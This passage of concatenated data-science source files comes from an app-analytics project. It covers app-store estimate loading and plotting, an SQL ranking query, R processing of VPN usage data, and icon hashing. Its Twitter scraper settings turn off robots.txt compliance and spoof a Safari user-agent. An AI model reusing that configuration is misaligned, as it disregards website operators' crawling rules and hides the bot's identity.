return df[['app_id']].drop_duplicates()
def load_estimates(input_dirs, top_rank=None, category=None, apps=None):
dfs = []
models = sorted(input_dirs.keys())
for model in models:
for f in listdir(input_dirs[model]):
if not f.endswith('.csv'):
continue
path = join(input_dirs[model],f)
if isfile(path):
df = pd.read_csv(path)
f_data = f.split('_')
df['model'] = model
if 'store_id' not in df.columns.values:
df['store_id'] = int(f_data[0])
if 'date' not in df.columns.values:
f_datab = f.split('-')
df['date'] = '%s-%s-%s'%(f_datab[1], f_datab[2], f_datab[3].split('.')[0])
if 'USD' in f_data:
df['unit'] = 'usd'
if 'Downloads' in f_data:
df['unit'] = 'downloads'
if top_rank is not None:
try:
df = df[df['rank']<=top_rank]
except:
continue
if category is not None:
try:
df = df[df['category_id']==category]
except:
continue
if apps is not None:
df = df.merge(apps, on='app_id', how='inner')
dfs.append(df)
dfs = pd.concat(dfs)
return dfs
def generate_sbe(df, platform):
if True:
iphone_downloads = df[(df['feed_id']==0) | (df['feed_id']==1)]
iphone_revenue = df[df['feed_id']==2]
ipad_downloads = df[(df['feed_id']==100) | (df['feed_id']==101)]
ipad_revenue = df[df['feed_id']==102]
iphone_downloads = _calculate_sbe(iphone_downloads)
iphone_downloads['unit'] = 'downloads'
iphone_downloads['device'] = 'iphone'
iphone_revenue = _calculate_sbe(iphone_revenue)
iphone_revenue['unit'] = 'usd'
iphone_revenue['device'] = 'iphone'
ipad_downloads = _calculate_sbe(ipad_downloads)
ipad_downloads['unit'] = 'downloads'
ipad_downloads['device'] = 'ipad'
ipad_revenue = _calculate_sbe(ipad_revenue)
ipad_revenue['unit'] = 'usd'
ipad_revenue['device'] = 'ipad'
df = pd.concat([iphone_downloads, iphone_revenue, ipad_downloads, ipad_revenue])
return df
def _calculate_sbe(df):
print("Calculating SBE...")
if df.shape[0] == 0:
return pd.DataFrame()
try:
df.drop('category_id', axis=1, inplace=True)
except:
pass
grouped = df.groupby(['model', 'store_id', 'app_id', 'feed_id', 'date',])
categories_aggregated = grouped.mean()
categories_aggregated = categories_aggregated.reset_index()
print("Categories aggregated")
feeds_aggregated = categories_aggregated.drop('feed_id', axis=1).groupby(['model', 'store_id', 'app_id', 'date']).sum()
print("Feeds aggregated")
return feeds_aggregated.reset_index()
def plot_estimates(df, platform):
df['f_date'] = [dt.datetime.strptime(d,'%Y-%m-%d').date() for d in df['date']]
gdf = df.groupby(['name', 'store_id', 'unit', 'device'])
for n, g in gdf:
#app_name = n[0]
app_name = slugify(n[0])
if platform == 'ios':
country_name = config.IOS_STORES_DICT[int(n[1])]
elif platform=='android':
country_name = config.ANDROID_STORES_DICT[int(n[1])]
plt.clf()
fig = plt.figure()
ax = fig.add_subplot(111)
plt.gca().xaxis.set_major_formatter(mdates.DateFormatter('%Y-%m-%d'))
plt.gca().xaxis.set_major_locator(mdates.DayLocator())
models = []
p = []
gdf2 = g.groupby('model')
for n2, g2 in gdf2:
pa, = plt.plot(g2['f_date'].values, g2['estimate'], '-')
p.append(pa)
models.append(n2)
plt.gcf().autofmt_xdate()
plt.ylim(0, g['estimate'].max()*1.2)
ax.grid()
#plt.ylim(g['estimate'].min()*0.9, g['estimate'].max()*1.5)
device = n[3]
if platform == 'android':
device = 'android'
ax.set_title('%s - %s - %s'%(app_name, country_name, device))
ax.set_ylabel(n[2])
ax.legend(p, models)
plt.savefig('%s/%s_%s_%s_%s.png'%(PLOTS_DIR, app_name, device, n[2], country_name))
#plt.show()
if __name__ == '__main__':
units = ['USD', 'Downloads']
platform = 'android'
category = 1
month = '2013-02'
PLOTS_DIR = '/Users/perezrafael/appannie/data_science/plotting/plots/top_apps_top_10_overall_%s_webui_%s'%(platform,month)
if not os.path.exists(PLOTS_DIR):
os.makedirs(PLOTS_DIR)
#countries = [143441,143465,143466,143462,143444]
input_files = {'original_%s'%month:'/Users/perezrafael/appannie/data_science/evaluation/data/%s_webui_original/%s/est_daily_raw'%(platform, month),
'dynamic_%s'%month:'/Users/perezrafael/appannie/data_science/evaluation/data/%s_webui_dynamic/%s/est_daily_raw'%(platform, month),
'preview_%s'%month:'/Users/perezrafael/appannie/data_science/evaluation/data/%s_webui_preview/%s/est_daily_raw'%(platform, month)}
#input_dirs = {
#'original':'/Users/perezrafael/appannie/data_science/evaluation/data/ios_daily/2013-02/est_daily_raw',
#'original_universals':'/Users/perezrafael/appannie/data_science/evaluation/data/ios_daily_universals/2013-02/est_daily_raw',
#'lowess':'/Users/perezrafael/appannie/data_science/evaluation/data/ios_daily_lowess/2013-02/est_daily_raw',
#'lowess_universals':'/Users/perezrafael/appannie/data_science/evaluation/data/ios_daily_lowess_universals/2013-02/est_daily_raw',
# 'web_ui': '/Users/perezrafael/appannie/data/%s_webui/%s'%(platform, MONTH),
# 'wew_ui_dynamic': '/Users/perezrafael/appannie/data_science/evaluation/ios_/daily_sbe_ratios/%s'%MONTH,
# 'wew_ui_preview': '/Users/perezrafael/appannie/data/daily_sbe_ratios/%s'%MONTH}
#input_dir = '/Users/perezrafael/appannie/data_science/evaluation/data/ios_daily/2013-02/est_daily_raw'
top_apps = load_estimates({'original':'/Users/perezrafael/appannie/data_science/evaluation/data/%s/%s/est_daily_raw'%(platform, month)}, top_rank=10, category=category)[['app_id']].drop_duplicates()
#top_apps = pd.DataFrame({'app_id': [432494037]})
#top_apps = load_estimates(input_dirs, top_rank=10, category=36)[['app_id']].drop_duplicates()
df = load_estimates(input_files, apps=top_apps)
#df = load_estimates({'web_ui': '/Users/perezrafael/appannie/data/%s_webui/%s'%(platform, MONTH)}, apps=top_apps)
df = generate_sbe(df, platform)
#if platform == 'ios':
#df21 = load_estimates({'web_ui_using_ratios': '/Users/perezrafael/appannie/data/daily_sbe_ratios_iphone/%s'%MONTH}, apps=top_apps)[['store_id', 'app_id', 'date', 'estimate', 'unit', 'model']]
#df21['device'] = 'iphone'
#df22 = load_estimates({'web_ui_using_ratios': '/Users/perezrafael/appannie/data/daily_sbe_ratios_ipad/%s'%MONTH}, apps=top_apps)[['store_id', 'app_id', 'date', 'estimate', 'unit', 'model']]
#df22['device'] = 'ipad'
#df = pd.concat([df,df21,df22])
#elif platform == 'android':
#df = df.drop('device', axis=1)
#df2 = load_estimates({'web_ui_using_ratios': '/Users/perezrafael/appannie/data/daily_sbe_ratios_android/%s'%MONTH}, apps=top_apps)[['store_id', 'app_id', 'date', 'estimate', 'unit', 'model']]
#df = pd.concat([df,df2])
#df['device'] = 'android'
df = get_app_names(df, platform)
plot_estimates(df, platform)
#for country in countries:
# for unit in units:
# plot_country(country, unit, 'ios')
<file_sep>/evaluation/py/join_lowess_est.py
'''
Created on Mar 27, 2013
@author: perezrafael
'''
import os
import sys
import os.path
from collections import defaultdict
import pandas as pd
def main():
print(sys.argv)
original_dir = sys.argv[1]
lowess_dir = sys.argv[2]
output_dir = sys.argv[3]
if not os.path.exists(output_dir):
os.makedirs(output_dir)
#input_dirs = _listdir_with_fullpath(lowess_dir) + _listdir_with_fullpath(original_dir)
original_paths = _listdir_with_fullpath(original_dir)
lowess_paths = _listdir_with_fullpath(lowess_dir)
g = _group_est_and_real(original_paths, lowess_paths)
for (group_name, files) in g:
#lowess_df = _read_daily_lowess(files[1:])
lowess_df = pd.concat(map(pd.read_csv, files[1:]))
lowess_df = lowess_df.drop(['store_id','universal'], axis=1)
original_df = pd.read_csv(files[0]).drop('estimate', axis=1)
lowess_df = lowess_df.merge(original_df, on=['category_id', 'feed_id', 'rank', 'date'], how='inner')
lowess_df = lowess_df.sort_index(by=['date', 'category_id', 'feed_id', 'rank'])
lowess_df.to_csv(os.path.join(output_dir, group_name), index=False)
def _listdir_with_fullpath(d):
return [os.path.join(d, i) for i in os.listdir(d)]
def _read_daily_lowess(paths):
dfs = []
for s in paths:
date = os.path.basename(s).split('_')[2][:10]
df = pd.read_csv(s)
df['date'] = date
dfs.append(df)
return pd.concat(dfs)
def _group_est_and_real(original_paths, lowess_paths):
# Corresponding est and real values should have the same base name.
# Despite that they're in different dirs.
d = defaultdict(list)
for s in original_paths:
arr_s = os.path.basename(s).split('_')[:2]
d[os.path.basename(s)].append(s)
for s2 in lowess_paths:
arr_s2 = os.path.basename(s2).split('_')[:3]
if arr_s[0] == arr_s2[0] and arr_s[1] == arr_s2[2]:
d[os.path.basename(s)].append(s2)
return d.iteritems()
def _load_dfs_from_pats(paths):
for path in paths:
df = pd.read_csv(path)
df['store_id']
df = pd.concat(map(pd.read_csv,paths))
return df
def _merge_lowess_and_original(dfs):
# @note: Use inner join, because we only care the case where we have
# estimation and real values.
dfs[1] = dfs[1].drop('estimate', axis=1)
merged = pd.merge(*dfs, on=['category_id', 'feed_id', 'rank'], how='inner')
return merged.sort_index(by=['date'])
if __name__ == '__main__':
main()
<file_sep>/ranking_change/test_variation.py
'''
Created on Aug 19, 2013
@author: perezrafael
'''
import pandas as pd
import csv
import matplotlib.pyplot as plt
def test_things(df):
gdf = df.groupby(['App ID', 'App Name']).std().reset_index()
#result = []
# g['std'] = g['Value'].std()
# del g['Value']
# g = g.drop_duplicates()
# result.append(g)
#result = pd.concat(result)
return gdf
def main():
metadata_f = '/Users/perezrafael/appannie/data/debug_files_with_subscription_and_universal_apps/US_Games_debug_2013-08-01_to_2013-08-14.csv'
df = pd.read_csv(metadata_f)
df = df[df['Feed']=='IPHONE_GROSSING']
df = df[['App ID', 'App Name', 'Day', 'Value']]
df = df.drop_duplicates()
#df = df[df['Value']>0]
# df = df.dropna()
df = df.sort(['App ID', 'Day'])
result = test_things(df)
result = result.sort('Value', ascending=False)
result.to_csv('data/crazy/res.csv', index=False, quoting = csv.QUOTE_NONNUMERIC)
for n, g in df.groupby(['App ID', 'App Name']):
plt.clf()
plt.plot(g['Value'])
plt.ylim(0, 135000)
plt.savefig('plots/crazy/%s.png'%str(n))
#plt.plot(result['Value'], '.', alpha=0.4)
#plt.show()
if __name__ == '__main__':
main()<file_sep>/audience/legacy_experiments/populate_review_categories.py
import pandas as pd
import psycopg2
import os
import datetime
import bz2
import calendar
import itertools
RANK_FILES_PATH = '/mnt/data/ranks'
CATEGORIES = [36, 100] + range(6000, 6019) + range(6020, 6024) + range(7001, 7020) + range(360, 364)
def load_ranks_file(path, store_ids=None, ranking_category_str_filter=None):
"""Load ranks from files"""
filename = os.path.split(path)[1]
assert filename.startswith('ranking_')
assert filename.endswith('.sql.bz2')
filename_date_str = filename[len('ranking_'):-len('.sql.bz2')]
#print filename_date_str
filename_date = datetime.datetime.strptime(filename_date_str, '%Y-%m-%d').date()
if ranking_category_str_filter is None:
ranking_category_str_filter = frozenset(map(str, CATEGORIES))
else:
ranking_category_str_filter = frozenset(ranking_category_str_filter)
f = bz2.BZ2File(path, 'r')
dfs = []
for line in f:
assert line.startswith(filename_date_str)
line_split = line.split('\t')
#print len(line_split)
ranking_date_str, ranking_store_str, ranking_category_str, ranking_feed_str, ranking_list_str_unsplit = line_split
if ranking_category_str not in ranking_category_str_filter:
continue
if ranking_feed_str == '3':
continue
if ranking_feed_str == '4':
continue
store_id = ranking_store_str
category_id = ranking_category_str
feed_id = ranking_feed_str
assert ranking_list_str_unsplit.endswith('\n')
ranking_list_str_split = ranking_list_str_unsplit.rstrip().split(' ')
df = pd.DataFrame(ranking_list_str_split).reset_index()
df.rename(columns={0:'app_id', 'index':'rank'}, inplace=True)
#df['rank'] += 1
#df['date'] = ranking_date_str
#df['store_id'] = store_id
df['category_id'] = category_id
#df['feed_id'] = feed_id
#print df.head()
dfs.append(df)
f.close()
dfs = pd.concat(dfs)
dfs = dfs[['app_id', 'category_id']].drop_duplicates()
return dfs
def main():
year = '2014'
months = ['01', '02', '03', '04', '05', '06']
#days = map(str, range(1, 32))
days = ['02', '03', '04', '05', '06', '08', '09']
for month, day in itertools.product(months, days):
last_day = calendar.monthrange(int(year),int(month))[1]
period_start = '{}-{}-01'.format(year, month)
period_end = '{}-{}-{}'.format(year, month, last_day)
filepath = '{}/ranking_{}-{}-{}.sql.bz2'.format(RANK_FILES_PATH, year, month, day)
if os.path.isfile(filepath)==False:
continue
ranks_df = load_ranks_file(filepath, store_ids=['143441'])
print filepath
#print ranks_df.head()
conn = psycopg2.connect("dbname=aa_reviews user=aa host=10.38.48.144 port=5432")
cur = conn.cursor()
query = 'INSERT INTO app_category VALUES (%s, %s, %s, %s)'
for row in ranks_df.iterrows():
app_id = row[1]['app_id']
category_id = row[1]['category_id']
if app_id == '':
continue
if category_id == '':
continue
params = (app_id, category_id, period_start, period_end, )
#print query
try:
cur.execute(query, params)
conn.commit()
except Exception, e:
#print "Couldn't do it: %s" % e
#print 'repeated', params
pass
conn.close()
if __name__ == '__main__':
main()<file_sep>/aa_au_model/lib/import_data.py
import datetime
import glob
import numpy as np
import pandas as pd
import warnings
from config import BUCKET_DIR
from config import ISO_CODE
from config import DATATYPE_BUCKET_DATA_DIRS
from config import DATATYPE_COLUMN_NAMES
from config import DOWNLOAD_TYPES
def datetime_from_unixtimestamp(unixtimestamp):
"""
Convert unix timestamp to datetime
:param unixtimestamp:
:return: a datetime object
"""
timestamp_in_seconds = np.floor(int(unixtimestamp) / 1000)
return datetime.datetime.fromtimestamp(timestamp_in_seconds)
def date_from_unixtimestamp(unixtimestamp):
"""
Convert unix timestamp to datetime
:param unixtimestamp:
:return: a date object
"""
timestamp_in_seconds = np.floor(int(unixtimestamp) / 1000)
return datetime.date.fromtimestamp(timestamp_in_seconds)
def import_data_filepaths(data_type, filepaths):
"""
:param data_type: should be either 'ingest', 'session', 'download', 'connection', 'device_info', 'dpi_apps' or 'pause'
:param filepaths: array of filepaths to import
:return: data frame
"""
column_names = DATATYPE_COLUMN_NAMES[data_type]
def load_data_from_file(file_path):
compression = 'gzip' if file_path.endswith('gz') else None
try:
data = pd.read_csv(file_path, delimiter='\t', header=None, names=column_names,
compression=compression, index_col=False)
except IOError:
data = None
warnings.warn("Error loading file: {}\n Continuing loading the rest...".format(file_path),
RuntimeWarning)
return data
df = pd.concat([load_data_from_file(f) for f in filepaths if f], ignore_index=True)
return df
def import_data_filedirs(data_type, filedirs):
"""
:param data_type: should be either 'ingest', 'session', 'download', 'connection', 'device_info', 'dpi_apps' or 'pause'
:param filedirs: array of filedirs to import
:return: data frame
"""
df = pd.DataFrame()
for file_dir in filedirs:
file_paths = glob.glob(file_dir + '/part*')
if file_paths:
df = df.append(import_data_filepaths(data_type, file_paths), ignore_index=True)
else:
warnings.warn("No file named 'part*' found in folder {}".format(file_dir), RuntimeWarning)
return df
def import_data(startdate, enddate, data_type, bucketdir=BUCKET_DIR, iso_code=ISO_CODE):
"""
Import the data for a specified data type and date range.
:param startdate: startdate formatted like 'yyyymmdd'
:param enddate: enddate formatted like 'yyyymmdd'
:param data_type: should be either 'ingest', 'session', 'download', 'connection', 'device_info' or 'pause'
:param bucketdir: Path to bucket dir
:param iso_code: Country to load data from (if applicable for data_type)
:return: DataFrame containing the imported data
"""
base_path = bucketdir + DATATYPE_BUCKET_DATA_DIRS[data_type] + '/'
if data_type in ('connection', 'device_info', 'pause', 'session'):
base_path += iso_code + '/'
filedirs = map(lambda x: base_path + pd.to_datetime(x).strftime('%Y-%m-%d') + '/',
pd.date_range(start=startdate, end=enddate))
df = import_data_filedirs(data_type, filedirs)
if data_type == 'session':
df['startdatetime'] = pd.to_datetime(np.floor(df.startTime / 1000), unit='s')
df['enddatetime'] = pd.to_datetime(np.floor(df.endTime / 1000), unit='s')
df['startdate'] = df.startdatetime.dt.date
df['duration'] = (df.endTime - df.startTime) / 1000
df['weeknumber'] = df.startdatetime.dt.week
elif data_type == 'pause':
df['start_at_datetime'] = df.start_timestamp.apply(lambda x: -1 if x == -1 else datetime_from_unixtimestamp(x))
df['end_at_datetime'] = df.end_timestamp.apply(lambda x: -1 if x == -1 else datetime_from_unixtimestamp(x))
elif data_type == 'connection':
df['start_at_datetime'] = df.start_timestamp.apply(datetime_from_unixtimestamp)
df['end_at_datetime'] = df.end_timestamp.apply(datetime_from_unixtimestamp)
elif data_type == 'download':
df['datetimestamp'] = df.timestamp.apply(datetime_from_unixtimestamp)
df['date'] = df.timestamp.apply(date_from_unixtimestamp)
df['download_type'] = df.download_type.apply(lambda x: DOWNLOAD_TYPES[x])
return df
def import_connect_pause_per_day(startdate, enddate, data_type, bucketdir=BUCKET_DIR, iso_code=ISO_CODE):
base_path = bucketdir + DATATYPE_BUCKET_DATA_DIRS[data_type] + '/' + 'US' + '/'
filedirs = map(lambda x: base_path + pd.to_datetime(x).strftime('%Y-%m-%d') + '/',
pd.date_range(start=startdate, end=enddate))
df = pd.DataFrame()
for filedir in filedirs:
print filedir
filepaths = glob.glob(filedir + '/part*')
print filepaths
if filepaths:
data = import_data_filepaths(data_type, filepaths)
data['start_at_date'] = data.start_timestamp.apply(lambda x: datetime_from_unixtimestamp(x).replace(hour=0,
minute=0,
second=0))
data['end_at_date'] = data.end_timestamp.apply(lambda x: datetime_from_unixtimestamp(x).replace(hour=0,
minute=0,
second=0))
data = (data[['device_id', 'start_at_date', 'end_at_date']].drop_duplicates()
.reset_index()[['device_id', 'start_at_date', 'end_at_date']])
data_start_end = data.reset_index()
data_start_end.columns = ['idz', 'device_id', 'start_at_date', 'end_at_date']
results_per_day = (data_start_end.set_index(['idz', 'device_id'])
.stack().reset_index()[['idz', 'device_id', 0]])
results_per_day.columns = ['idz', 'device_id', 'date']
results_per_day.set_index('date', inplace=True)
results_per_day = results_per_day.groupby(['idz']).resample('1d', how='count').reset_index()
results = pd.merge(data_start_end, results_per_day, on='idz',
suffixes=('', '_count'))[['device_id', 'date']].drop_duplicates()
df = df.append(results, ignore_index=True)
df = df.drop_duplicates()
df['active'] = 1
df = df.set_index('date').sort('device_id').groupby('device_id').resample('1d', how='count')
df['active'] = df.active.apply(lambda x: True if x == 1 else False)
return df
<file_sep>/top-app-stability/Distimo_data_queries/Android_estimates_per_week.sql
DROP TEMPORARY TABLE IF EXISTS temp.weeks;
CREATE TEMPORARY TABLE temp.weeks
(CONSTRAINT PRIMARY KEY (date, start_date))
SELECT
adddate(date, INTERVAL 1 DAY) as date,
date_sub(adddate(date, INTERVAL 1-DAYOFWEEK(date_sub(date, interval 1 day)) DAY), interval 1 day) as start_date
FROM
estimates.application_data_market
WHERE
date >= '2014-07-28' and date <= '2014-08-03'
GROUP BY date;
DROP temporary table IF EXISTS temp.market_top_est;
CREATE temporary TABLE temp.market_top_est
(CONSTRAINT PRIMARY KEY (start_date,iso_code,feed,rank))
SELECT
start_date,
cn.iso_code,
IF(x1.type='gross','revenue',x1.type) as feed,
rank,
estimate
FROM (
SELECT
start_date,
appstore_instance_id,
type,
estimate,
IF(
(@prev=CONCAT('1','-',x.start_date,'-',x.appstore_instance_id,'-',x.type)),
@rank:=@rank+1,
((@prev:=CONCAT('1','-',x.start_date,'-',x.appstore_instance_id,'-',x.type)) AND (@rank:=1))
) AS rank
FROM(
SELECT
w.start_date,
e.appstore_instance_id,
e.application_id,
e.type,
sum(e.estimate) as estimate
FROM
estimates.application_data_market e
JOIN temp.weeks w
ON w.date = e.date
GROUP BY w.start_date, appstore_instance_id,application_id, type
ORDER BY w.start_date, appstore_instance_id, type, estimate DESC
) x, (SELECT @rank:=1, @prev:='') dummy
) x1
JOIN market.appstore_instances ai
ON ai.id = x1.appstore_instance_id
JOIN appstore.countries cn
ON cn.id = ai.country_id
WHERE rank <= 50;
INSERT INTO aa_benchmarking_android.stability_weekly_aggregated
select
*
from
temp.market_top_est;<file_sep>/aa_au_model/r_scripts/process_data.R
###################################
### Load packages ###
### Load user defined functions ###
### Call main code ###
###################################
############################## START LOAD PREREQUISITES #####################################################
#################
# clear memory #
#################
#rm(list=ls())
#################
# load user_def #
#################
source("~/r_scripts/user_def.R")
#################################### END LOAD PREREQUISITES ##################################################
##############################################################################################################
##############################################################################################################
##############################################################################################################
################################## START GLOBAL VARIABLES ####################################################
##############################
# select start and end dates #
##############################
startDate = "2015-01-11"
endDate = "2015-01-17"
###########################
# set working directories #
###########################
bucket = "/s3mnt-projecta/aardvark-prod-pdx-ds-sample"
folder_name_session = paste(bucket,"VPN_APP_USAGE_SESSION",sep="/")
folder_name_pause_resume = paste(bucket,"VPN_PAUSE_RESUME_SESSION",sep="/")
folder_name_connection = paste(bucket,"VPN_CONNECTION_SESSION",sep="/")
folder_name_purchase = paste(bucket,"VPN_DOWNLOAD_TAGGING",sep="/")
folder_name_ingest = paste(bucket,"VPN_DPI_INGEST",sep="/")
folder_name_device = paste(bucket,"VPN_NEW_DEVICE_INFO",sep="/")
#################################### END GLOBAL VARIABLES ####################################################
##############################################################################################################
##############################################################################################################
##############################################################################################################
################################## START MAIN CODE ANALYSIS ##################################################
#################
# CONNECTION #
#################
# select date range
rangeDate = readDate(as.Date(startDate)-7,as.Date(endDate)+3)
# set working directory
setwd(folder_name_connection)
cat("Start processing connection data...\n")
# Read session data files for selected dates
us_connection_data = readFolder(folder_name_connection,rangeDate)
colnames(us_connection_data) = c("device_id","start_time","end_time","offset")
# extract date and time (UTC in milliseconds)
us_connection_data$gmt_start_time = as.POSIXct(us_connection_data$start_time/1000,origin="1970-01-01",tz="GMT")
us_connection_data$gmt_end_time = as.POSIXct(us_connection_data$end_time/1000,origin="1970-01-01",tz="GMT")
us_connection_data$gmt_start_date = as.Date(us_connection_data$gmt_start_time)
us_connection_data$gmt_start_hour = as.POSIXlt(us_connection_data$gmt_start_time)$hour
us_connection_data$gmt_end_hour = as.POSIXlt(us_connection_data$gmt_end_time)$hour
# select only columns 'device_id' and 'gmt_start_date'
subset_connection_data = us_connection_data[,c('device_id','gmt_start_date')]
rm(us_connection_data)
gc()
###########################################################################################################
#################
# DEVICE DATA #
#################
# select date range (always start from first date when app launched)
rangeDate = readDate(as.Date("2014-10-01"),Sys.Date() - 1)
# set working directory
setwd(folder_name_device)
cat("Start processing DEVICE data...\n")
# Read session data files for selected dates
device_data = readFolder(folder_name_device,rangeDate)
colnames(device_data) = c("device_id","provider","manufacturer","device","OS","device_type")
# select only iOS data
subset_device_data = subset(device_data, OS == 'iOS', select=c('device_id','device_type'))
rm(device_data)
gc()
###########################################################################################################
#################
# SESSION DATA #
#################
# select date range
rangeDate = readDate(startDate, endDate)
# set working directory
setwd(folder_name_session)
cat("Start processing session data files...\n")
# Read session data files for selected dates
us_session_data = readFolder(folder_name_session,rangeDate)
colnames(us_session_data) = c("device_id","iso_code","city","bundle_id","start_time","end_time","offset")
# extract date and time (UTC in milliseconds)
us_session_data$gmt_start_time = as.POSIXct(us_session_data$start_time/1000, origin="1970-01-01",tz="GMT")
us_session_data$gmt_end_time = as.POSIXct(us_session_data$end_time/1000, origin="1970-01-01",tz="GMT")
us_session_data$gmt_date = as.Date(us_session_data$gmt_start_time)
us_session_data$session_length = with(us_session_data, difftime(gmt_end_time,gmt_start_time))
###########################################################################################################
######################
# PAUSE/RESUME DATA #
######################
# set working directory
setwd(folder_name_pause_resume)
cat("Start processing pause_resume data...\n")
# Read pause/resume data files for selected dates
us_pause_resume = readFolder(folder_name_pause_resume,rangeDate)
colnames(us_pause_resume) = c("device_id","pause_at","resume_at","offset")
# extract date and time (UTC in milliseconds)
us_pause_resume$gmt_pause_time = as.POSIXct(us_pause_resume$pause_at/1000,origin="1970-01-01",tz="GMT")
us_pause_resume$gmt_resume_time = as.POSIXct(us_pause_resume$resume_at/1000,origin="1970-01-01",tz="GMT")
us_pause_resume$gmt_pause_date = as.Date(us_pause_resume$gmt_pause_time)
us_pause_resume$gmt_resume_date = as.Date(us_pause_resume$gmt_resume_time)
# select only columns 'device_id' and 'gmt_pause_date'
subset_pause_data = us_pause_resume[,c('device_id','gmt_pause_date')]
rm(us_pause_resume)
gc()
##########################################################################################################
# get active devices for the week
start_week = as.Date(startDate)
active_devices = active_devices_date(start_week)
for(i in 1:6) active_devices = intersect(active_devices, active_devices_date(start_week+i))
# select devices with specific device type
dev_type = c("Smartphone","Tablet")
dev=dev_type[1]
active_devices_dev_type = intersect(active_devices, subset_device_data[subset_device_data$device_type == dev,'device_id'])
# select devices with US only for entire week
check_country = subset(us_session_data, device_id %in% active_devices_dev_type, select=c(device_id,iso_code))
check_country = check_country[!duplicated(check_country),]
final_subset_device_id = names(which(table(check_country$device_id)==1))
# select device_ids for final sample
final_active_devices = intersect(final_subset_device_id,active_devices_dev_type)
dataset = subset(us_session_data, device_id %in% final_active_devices ,select=device_id:session_length)
<file_sep>/audience/twitter-scraping/lib/scraper/scraper/settings.py
# -*- coding: utf-8 -*-
# Scrapy settings for scraper project
#
# For simplicity, this file contains only the most important settings by
# default. All the other settings are documented here:
#
# http://doc.scrapy.org/en/latest/topics/settings.html
#
BOT_NAME = 'scraper'
SPIDER_MODULES = ['scraper.spiders']
NEWSPIDER_MODULE = 'scraper.spiders'
# Crawl responsibly by identifying yourself (and your website) on the user-agent
#USER_AGENT = 'scraper (+http://www.yourdomain.com)'
ROBOTSTXT_OBEY = False
COOKIES_ENABLED = True
DOWNLOAD_DELAY = 1
CONCURRENT_REQUESTS_PER_DOMAIN = 1
USER_AGENT = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10'
#LOG_FILE = 'log_scrape.log'
#LOG_LEVEL = 'INFO'
ITEM_PIPELINES = {
'scraper.pipelines.ConvertData': 300
}
<file_sep>/exact-matching-improvement/icon_lib/icon_processing.py
"""
Module for processing icons. Main functions:
- get_raw_image: get icons from URL and write to disk (optional)
- generate_no_icon_data: generate image data for 'no icon available'-icon
- display_image: display strings with images
- process_local_icon: process (=hash & compute statistics) for local icons
- process_online_icon: process (=hash & compute statistics) for online icons
"""
__author__ = 'srhmtonk'
from subprocess import PIPE, Popen
from IPython.display import display, Image
import requests
import cStringIO
import PIL
import imagehash
import time
from config import (DEFAULT_HASH_TYPE, DEFAULT_HASH_SIZE)
from io import BytesIO
def get_raw_image(url, filename=None, raw_filter_image=None):
"""
Retrieve raw image bytecode from url.
:param url: URL to load icon image from
:param filename: Path to save image to (optional)
:param raw_filter_image: String with image to filter loaded images with.
:return: string with image
"""
try:
response = requests.get(url, stream=True)
except requests.exceptions.ConnectionError:
time.sleep(5)
response = requests.get(url, stream=True)
if response.status_code == requests.codes.ok:
raw_image = response.raw.read(decode_content=True)
if raw_filter_image:
raw_image = filter_image(raw_image, raw_filter_image)
if filename is not None:
with open(filename, 'w') as f:
f.write(raw_image)
else:
raw_image = None
return raw_image
def filter_image(raw_image, raw_filter_image):
"""
Filters out an icon (e.g. Distimo's 'no icon available (yet)') in a complicated way. A string with an empty image
of the same size and type is returned if raw_image is the same as raw_filter_image.
:param raw_image: String with image
:param raw_filter_image: String with icon to filter out
:return: String with (possibly if filtered white) image
"""
has_same_length = (len(raw_image) == len(raw_filter_image))
if has_same_length and (raw_image == raw_filter_image):
raw_image = generate_white_image_string(raw_image)
return raw_image
def generate_white_image_string(raw_image):
"""
Generate a string containing a white image
:param raw_image: String with image
:return: String with image of the same size and type as the input image
"""
pil_image = convert_to_pil_image(raw_image)
white_image = PIL.Image.new(pil_image.mode, pil_image.size, color='white')
img_buffer = cStringIO.StringIO()
white_image.save(img_buffer, format=pil_image.format)
return img_buffer.getvalue()
def convert_to_pil_image(raw_image):
"""
Convert raw image to PIL image
"""
image_stream = cStringIO.StringIO(raw_image)
return PIL.Image.open(image_stream)
def generate_no_icon_data(display_icon=False):
"""
Generate the icon that is return when icon was not found.
"""
raw_no_image = get_no_icon()
return process_online_icon(raw_no_image, display_icon=display_icon)
def get_no_icon(no_icon_url='http://assets-01.distimo.com/icons/1/no-icon', url_suffix='?size=64'):
"""
Gets a processed no icon image.
:param no_icon_url: No icon url
:param url_suffix: Suffix to append
:return: string with processed image
"""
return get_raw_image(no_icon_url + url_suffix)
def display_image(image, image_format='png'):
"""
Display the raw image bytecode in IPython notebook.
"""
bio = BytesIO()
image.save(bio, format=image_format)
display(Image(bio.getvalue(), format=image_format))
def process_local_icon(file_name, hash_type=DEFAULT_HASH_TYPE, hash_size=DEFAULT_HASH_SIZE, display_icon=False):
"""
Retrieve and process local icon.
"""
result = {}
with open(file_name, "r") as myfile:
raw_icon = myfile.read()
result = process_icon(raw_icon, hash_type, hash_size, display_icon)
return result
def process_online_icon(icon_url, url_suffix='?size=64', hash_type=DEFAULT_HASH_TYPE, hash_size=DEFAULT_HASH_SIZE,
display_icon=False):
"""
Retrieve and process icon stored at icon_url.
"""
raw_icon = get_raw_image(icon_url+url_suffix)
if raw_icon is None:
result = None
else:
result = process_icon(raw_icon, hash_type, hash_size, display_icon)
return result
def process_icon(raw_icon, hash_type=DEFAULT_HASH_TYPE, hash_size=DEFAULT_HASH_SIZE, display_icon=False):
"""
Process the raw icon: convert to PIL image, compute hash and average color.
"""
raw_icon_converted = convert_raw_image(raw_icon)
icon_converted = convert_to_pil_image(raw_icon_converted)
if display_icon:
display_image(icon_converted)
result = {}
result['hash'] = str(compute_imagehash(icon_converted, hash_type, hash_size))
result['avg_r'], result['avg_b'], result['avg_g'] = compute_averagecolor(icon_converted)
return result
def convert_raw_image(raw_image):
"""
Convert the raw image; flatten, auto-level, resize and make circular.
"""
# "convert \( fd:0 -flatten -auto-level -resize 64x64 \)"+
# " \( +clone -alpha extract \)"+
# " \( +clone -fill white -colorize 100% -background black -vignette 1x1+4+4 \)"+
# " \( -clone 1 -clone 2 -compose multiply -composite \)"+
# " -delete 1,2 -alpha off -compose copy_opacity -composite -flatten png:fd:1",
proc = Popen("convert \( fd:0 -flatten -auto-level -resize 64x64 \)"+
" \( +clone -alpha extract \)"+
" \( +clone -fill white -colorize 100% -background black -vignette 1x1+4+4 \)"+
" \( -clone 1 -clone 2 -compose multiply -composite \)"+
" -delete 1,2 -alpha off -composite png:fd:1",
